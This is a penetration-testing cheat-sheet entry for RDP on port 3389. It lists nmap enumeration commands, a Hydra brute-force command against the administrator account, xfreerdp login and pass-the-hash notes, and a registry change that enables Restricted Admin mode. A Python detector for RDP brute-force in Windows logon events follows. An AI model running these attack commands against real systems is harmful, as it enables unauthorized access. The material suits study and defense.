RDP - 3389
The Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft that allows users to connect to and control a remote computer over a network. It provides a graphical interface to the user for managing remote systems as if they were sitting in front of them.
- Default port: 3389
Enumeration
# Nmap service/version detection for RDP
nmap -p 3389 -sV --script=rdp-ntlm-info,rdp-enum-encryption 10.10.10.10
# Check for the MS12-020 RDP flaw (the rdp-vuln-ms12-020 script does not test for BlueKeep / CVE-2019-0708)
nmap -p 3389 --script=rdp-vuln-ms12-020 10.10.10.10
# Enumerate the RDP TLS certificate details
openssl s_client -connect 10.10.10.10:3389
Exploitation
# Attempt brute-force with Hydra
hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://10.10.10.10
# Connect using xfreerdp (Linux client)
xfreerdp /v:10.10.10.10 /u:administrator /p:'password' /cert:ignore
# Note: /pth:<HASH> can be used for a pass-the-hash login; this only works when Restricted Admin mode is enabled on the target.
# If PtH fails, Restricted Admin mode is likely disabled. It is enabled by setting DisableRestrictedAdmin to 0 (requires admin rights on the target):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
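From the defender's side, the Hydra brute-force above shows up as a burst of Windows Security event 4625 (failed logon) with LogonType 10 (RemoteInteractive, i.e. RDP) from one source, often followed by a 4624 success. The following detector is an added example, not code from the original page; the event records are constructed and the field names are assumptions chosen for a pre-parsed log.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of pre-parsed Windows Security events (not real telemetry).
# 4625 = failed logon, 4624 = successful logon; logon_type 10 = RemoteInteractive (RDP).
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "id": 4625, "logon_type": 10, "user": "administrator", "src": "10.10.10.50"},
    {"time": "2024-01-01T10:00:10", "id": 4625, "logon_type": 10, "user": "administrator", "src": "10.10.10.50"},
    {"time": "2024-01-01T10:00:20", "id": 4625, "logon_type": 10, "user": "administrator", "src": "10.10.10.50"},
    {"time": "2024-01-01T10:00:30", "id": 4625, "logon_type": 10, "user": "administrator", "src": "10.10.10.50"},
    {"time": "2024-01-01T10:00:40", "id": 4625, "logon_type": 10, "user": "administrator", "src": "10.10.10.50"},
    {"time": "2024-01-01T10:00:50", "id": 4625, "logon_type": 10, "user": "administrator", "src": "10.10.10.50"},
    {"time": "2024-01-01T10:01:00", "id": 4624, "logon_type": 10, "user": "administrator", "src": "10.10.10.50"},
    # SMB (logon_type 3) failure from the same host: not RDP, must be ignored by this rule.
    {"time": "2024-01-01T10:01:05", "id": 4625, "logon_type": 3, "user": "administrator", "src": "10.10.10.50"},
    # A user mistyping a password twice is below threshold and must not alert.
    {"time": "2024-01-01T10:02:00", "id": 4625, "logon_type": 10, "user": "alice", "src": "10.10.10.77"},
    {"time": "2024-01-01T10:02:30", "id": 4625, "logon_type": 10, "user": "alice", "src": "10.10.10.77"},
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return {src_ip: summary} for every source that produced at least `threshold`
    RDP (logon_type 10) failures inside any `window`, and list the accounts that
    then logged in successfully over RDP from that source after the burst began."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if e.get("logon_type") != 10:       # only RemoteInteractive (RDP) logons
            continue
        ts = datetime.fromisoformat(e["time"])
        if e["id"] == 4625:
            failures[e["src"]].append(ts)
        elif e["id"] == 4624:
            successes[e["src"]].append((ts, e["user"]))

    alerts = {}
    for src, times in failures.items():
        # Sliding window over the sorted failure timestamps: largest burst within `window`.
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            after = [u for ts, u in successes.get(src, []) if ts >= times[0]]
            alerts[src] = {"max_failures_in_window": best, "success_after_failures": after}
    return alerts


if __name__ == "__main__":
    print(detect_rdp_bruteforce(SAMPLE_EVENTS))
```

A success following a burst from the same source is the higher-priority signal, since it indicates the password spray or brute force succeeded rather than merely being attempted.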